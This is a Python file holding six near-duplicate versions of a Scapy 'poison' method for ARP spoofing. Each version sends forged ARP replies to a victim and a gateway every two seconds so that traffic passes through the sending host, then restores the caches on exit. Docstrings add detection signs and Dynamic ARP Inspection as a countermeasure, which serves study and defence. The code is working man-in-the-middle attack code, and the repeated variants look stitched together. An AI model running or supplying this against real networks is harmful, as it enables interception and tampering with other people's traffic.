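def poison(self):
    """Send spoofed ARP replies to the victim and the gateway for 45 seconds.

    Two ARP replies are prepared up front and re-sent every two seconds:

    * ``poison_victim`` is addressed to the victim and names the gateway's
      IP address as its sender.
    * ``poison_gateway`` is addressed to the gateway and names the victim's
      IP address as its sender.

    ``hwsrc`` is never assigned; Scapy fills it in with the MAC address of
    the sending interface, which is what binds the claimed IP to this host.

    ``self.restore()`` (defined elsewhere) runs when the 45 seconds are up
    and also when the loop is interrupted, so an aborted run does not leave
    the spoofed entries in the two ARP caches.

    Detection: on the wire this is a steady stream of unsolicited ARP
    replies in which the gateway's IP is bound to a non-gateway MAC. ARP
    monitoring reports the changed binding, and switch-level Dynamic ARP
    Inspection drops such replies.
    """
    # 1) Packet for the victim.
    poison_victim = ARP()
    # op 2 is an ARP reply ("is-at"); op 1 would be a request ("who-has").
    poison_victim.op = 2
    # The "p" prefix means protocol (IP) address, "hw" means hardware (MAC)
    # address. The claimed sender IP is the gateway's, not this host's.
    poison_victim.psrc = self.gateway
    poison_victim.pdst = self.victim
    poison_victim.hwdst = self.victimmac
    print(f'ip src: {poison_victim.psrc} (ie the gateway - not my machine!')
    print(f'ip dst: {poison_victim.pdst}')
    print(f'mac dst: {poison_victim.hwdst}')
    # Not set above: this prints the default Scapy derives for hwsrc.
    print(f'mac src: {poison_victim.hwsrc}')
    print(poison_victim.summary())
    print('-' * 30)

    # 2) Packet for the gateway: same shape, with the roles swapped.
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = self.victim
    poison_gateway.pdst = self.gateway
    poison_gateway.hwdst = self.gatewaymac
    print(f'ip src: {poison_gateway.psrc}')
    print(f'ip dst: {poison_gateway.pdst}')
    print(f'mac dst: {poison_gateway.hwdst}')
    print(f'mac_src: {poison_gateway.hwsrc}')
    print(poison_gateway.summary())
    print('-' * 30)

    # 3) Re-send both packets every two seconds until the deadline.
    print('Beginning the ARP poison (ie sending the packets).Ffor 45 seconds.')
    t_end = time.time() + 45  # 45 seconds
    try:
        while time.time() < t_end:
            # Progress marker: one timestamp per round.
            sys.stdout.write(time.strftime("%H:%M:%S") + "~")
            sys.stdout.flush()
            send(poison_victim)
            send(poison_gateway)
            time.sleep(2)
    finally:
        # Runs on normal expiry and on Ctrl-C alike, so the caches are
        # always handed back to restore().
        self.restore()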
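def poison(self):
    """Send spoofed ARP replies to the victim and the gateway until Ctrl-C.

    ``poison_victim`` tells the victim that the gateway's IP address lives
    at this host's MAC address; ``poison_gateway`` tells the gateway the
    same about the victim's IP address. Both are ARP replies (op 2).
    ``hwsrc`` is not assigned, so Scapy supplies the MAC address of the
    sending interface.

    Both packets are re-sent every two seconds. ``KeyboardInterrupt`` is
    caught around the whole loop, including the sleep, so that
    ``self.restore()`` (defined elsewhere) is called before the process
    exits wherever the interrupt lands.

    Detection: repeated unsolicited ARP replies that rebind the gateway's
    IP to a different MAC are the observable signature; Dynamic ARP
    Inspection or a static gateway entry on the hosts prevents the rebind.
    """
    # Reply addressed to the victim, claiming to come from the gateway's IP.
    poison_victim = ARP()
    poison_victim.op = 2
    poison_victim.psrc = self.gateway
    poison_victim.pdst = self.victim
    poison_victim.hwdst = self.victimmac
    print(f'ip src: {poison_victim.psrc}')
    print(f'ip dst: {poison_victim.pdst}')
    print(f'mac dst: {poison_victim.hwdst}')
    print(f'mac src: {poison_victim.hwsrc}')
    print('-' * 30)

    # Reply addressed to the gateway, claiming to come from the victim's IP.
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = self.victim
    poison_gateway.pdst = self.gateway
    poison_gateway.hwdst = self.gatewaymac
    print(f'ip src: {poison_gateway.psrc}')
    print(f'ip dst: {poison_gateway.pdst}')
    print(f'mac dst: {poison_gateway.hwdst}')
    print(f'mac src: {poison_gateway.hwsrc}')
    print(poison_gateway.summary())
    print('-' * 30)

    print('Beginning the ARP posion. [Ctrl-c to stop]')
    try:
        while True:
            sys.stdout.write('.')
            sys.stdout.flush()
            send(poison_victim)
            send(poison_gateway)
            # Most of each round is spent here, so the sleep has to sit
            # inside the try for Ctrl-C to reach the handler below.
            time.sleep(2)
    except KeyboardInterrupt:
        self.restore()
        sys.exit()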
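def poison(self):
    '''Create poisoned ARP replies and send them to the victim and the gateway.

    The victim receives a reply whose sender IP is the gateway's; the
    gateway receives one whose sender IP is the victim's. Neither packet
    sets ``hwsrc``, so the sender MAC is the one Scapy derives for the
    sending interface (printed below as the "ATTACKER" MAC).

    The pair is re-sent every two seconds so the entries stay in place.
    Ctrl-C anywhere in the loop, including during the sleep, calls
    ``self.restore()`` (defined elsewhere) and then exits.

    The original author notes that IP forwarding should be enabled on the
    sending host's NIC.

    Detection: the stream of unsolicited op-2 replies and the changed
    IP-to-MAC binding for the gateway are what ARP monitoring keys on;
    Dynamic ARP Inspection on the switch drops the replies.
    '''
    poison_victim = ARP()
    poison_victim.op = 2  # ARP reply
    poison_victim.psrc = self.gateway
    poison_victim.pdst = self.victim
    poison_victim.hwdst = self.victimmac
    print(f'Gateway, IP source: {poison_victim.psrc}')
    print(f'Victim, IP destiantion: {poison_victim.pdst}')
    print(f'ATTACKER, MAC source: {poison_victim.hwsrc}')
    print(f'Victim, MAC destination: {poison_victim.hwdst}')
    print(poison_victim.summary())
    print('~*~' * 15)

    poison_gateway = ARP()
    poison_gateway.op = 2  # ARP reply
    poison_gateway.psrc = self.victim
    poison_gateway.pdst = self.gateway
    poison_gateway.hwdst = self.gatewaymac
    print(f'Victim, IP source: {poison_gateway.psrc}')
    print(f'Gateway, IP destiantion: {poison_gateway.pdst}')
    print(f'ATTACKER, MAC source: {poison_gateway.hwsrc}')
    print(f'Gateway, MAC destination: {poison_gateway.hwdst}')
    print(poison_gateway.summary())
    print('><(((º> ' * 15)

    print('Begin the ARP poison. [CTRL-C to stop]')
    try:
        while True:
            # One dot per round, flushed so it shows up immediately.
            sys.stdout.write('.')
            sys.stdout.flush()
            send(poison_victim)
            send(poison_gateway)
            # Kept inside the try: an interrupt during the pause must also
            # reach the handler that restores the caches.
            time.sleep(2)
    except KeyboardInterrupt:
        # Restore the ARP cache entries before leaving.
        self.restore()
        sys.exit()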
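def poison(self):
    """Simple ARP poisoner: loop spoofed replies at the victim and gateway.

    - Builds an ARP reply (op 2) for the victim whose sender IP is the
      gateway's.
    - Builds an ARP reply (op 2) for the gateway whose sender IP is the
      victim's.
    - Leaves ``hwsrc`` unset in both, so Scapy uses the MAC address of the
      sending interface as the sender MAC.
    - Sends both packets, waits two seconds, and repeats.

    The loop runs until the user presses CTRL-C. The interrupt is handled
    around the whole loop, sleep included, so ``self.restore()`` (defined
    elsewhere) is always called before ``sys.exit()``.

    Detection: look for unsolicited ARP replies arriving every couple of
    seconds and for the gateway's IP resolving to a new MAC; Dynamic ARP
    Inspection or static ARP entries stop the cache update.
    """
    poison_victim = ARP(
        op=2,
        psrc=self.gateway,
        pdst=self.victim,
        hwdst=self.victim_mac,
    )
    print(f'IP src: {poison_victim.psrc}')
    print(f'IP dst: {poison_victim.pdst}')
    print(f'MAC dst: {poison_victim.hwdst}')
    print(f'MAC src: {poison_victim.hwsrc}')
    print(poison_victim.summary())
    print('-' * 30)

    poison_gateway = ARP(
        op=2,
        psrc=self.victim,
        pdst=self.gateway,
        hwdst=self.gateway_mac,
    )
    print(poison_gateway.summary())
    print('-' * 30)

    print('Beginning the ARP poison. [CTRL-C to stop]')
    try:
        while True:
            sys.stdout.write('.')
            sys.stdout.flush()
            send(poison_victim)
            send(poison_gateway)
            # The pause is inside the try so CTRL-C during it still
            # triggers the restore below.
            time.sleep(2)
    except KeyboardInterrupt:
        self.restore()
        sys.exit()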
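def poison(self):
    """Send spoofed ARP replies to the victim and the gateway until CTRL-C.

    Two ARP replies (op 2) are built: one addressed to the victim with the
    gateway's IP as sender, one addressed to the gateway with the victim's
    IP as sender. ``hwsrc`` is left at the default, which Scapy resolves to
    the MAC address of the sending interface.

    The packets are printed once, then re-sent every two seconds. CTRL-C at
    any point in the loop, including during the sleep, calls
    ``self.restore()`` (defined elsewhere) and exits.

    Detection: the gateway's IP flipping to a different MAC and the regular
    unsolicited replies are the indicators; Dynamic ARP Inspection on the
    switch, or a static gateway entry on the host, blocks the change.
    """
    # Reply for the victim: sender IP is the gateway's.
    poison_victim = ARP()
    poison_victim.op = 2
    poison_victim.psrc = self.gateway_ip
    poison_victim.pdst = self.victim_ip
    poison_victim.hwdst = self.victim_mac

    # Reply for the gateway: sender IP is the victim's.
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = self.victim_ip
    poison_gateway.pdst = self.gateway_ip
    poison_gateway.hwdst = self.gateway_mac

    # Same report for both packets, victim first.
    for packet in (poison_victim, poison_gateway):
        print(f'IP source: {packet.psrc}')
        print(f'MAC source: {packet.hwsrc}')
        print(f'IP destination: {packet.pdst}')
        print(f'MAC destination: {packet.hwdst}')
        print(packet.summary())
        print('-' * 30)

    print('Beginning the ARP poison. [CTRL-C to stop]')
    try:
        while True:
            sys.stdout.write('.')
            sys.stdout.flush()
            send(poison_victim)
            send(poison_gateway)
            # Sleeping inside the try keeps an interrupt during the pause
            # from skipping the restore.
            time.sleep(2)
    except KeyboardInterrupt:
        self.restore()
        sys.exit()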
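def poison(self):
    """Send spoofed ARP replies to the target and the gateway until a deadline.

    Two ARP replies (op 2) are built: one addressed to the target with the
    gateway's IP as sender, one addressed to the gateway with the target's
    IP as sender. ``hwsrc`` is not assigned, so Scapy supplies the MAC
    address of the sending interface.

    The packets are re-sent every two seconds while ``time.time()`` is below
    ``TIME_LIMIT`` (defined elsewhere; presumably an absolute timestamp).
    Ctrl-C anywhere in the loop, including during the sleep, calls
    ``self.restore()`` (defined elsewhere) and exits.

    Detection: repeated unsolicited ARP replies and a changed MAC for the
    gateway's IP are the indicators; Dynamic ARP Inspection or static ARP
    entries prevent the cache update.
    """
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = self.gateway
    poison_target.pdst = self.target
    poison_target.hwdst = self.target_mac
    # print, not printf: no printf is visible here and the neighbouring
    # lines already use print. The destination IP field is pdst; an ARP
    # layer has no dst field.
    print(f'IP Src: {poison_target.psrc}')
    print(f'IP Dst: {poison_target.pdst}')
    print(f'MAC Dst: {poison_target.hwdst}')
    print(f'MAC Src: {poison_target.hwsrc}')
    print(poison_target.summary())
    print('-' * 30)

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = self.target
    poison_gateway.pdst = self.gateway
    poison_gateway.hwdst = self.gateway_mac
    print(f'IP Src: {poison_gateway.psrc}')
    print(f'IP Dst: {poison_gateway.pdst}')
    print(f'MAC Dst: {poison_gateway.hwdst}')
    print(f'MAC Src: {poison_gateway.hwsrc}')
    print(poison_gateway.summary())
    print('-' * 30)

    print('Beginning ARP Poison. [Press Ctrl-C to stop]')
    try:
        while time.time() < TIME_LIMIT:
            sys.stdout.write('.')
            sys.stdout.flush()
            send(poison_target)
            send(poison_gateway)
            # Inside the try so an interrupt during the pause still
            # reaches the restore below.
            time.sleep(2)
    except KeyboardInterrupt:
        self.restore()
        sys.exit()
    # NOTE(review): when TIME_LIMIT passes, the loop ends without calling
    # restore() here. Confirm the caller restores the ARP caches on this
    # path.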